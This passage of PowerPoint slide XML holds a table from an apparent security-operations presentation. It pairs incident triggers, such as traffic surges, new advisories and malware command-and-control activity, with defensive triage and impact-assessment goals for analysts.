                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Unexplained surge </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>in traffic</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="CAD7CA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Quickly conclude if anomaly is associated with a threat. </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="CAD7CA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2367829205"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="836686">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="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New advisory arrives</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="E6ECE7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rapidly determine impact to your organization, including the importance of services affected.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Determine whether the vulnerability was used against your organization before the systems were patched.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="E6ECE7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="964377950"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Internal IP reported </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>as infected</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="CAD7CA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Quickly triage and confirm the incident or reject </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>as a false positive.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="CAD7CA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1257910503"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Observation of malware C&amp;C launching an attack</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="E6ECE7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Determine 1) if the attack is new 2) what might be the goal or purpose of the attack 3) estimate the impact on the constituency.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="E6ECE7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2685305440"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
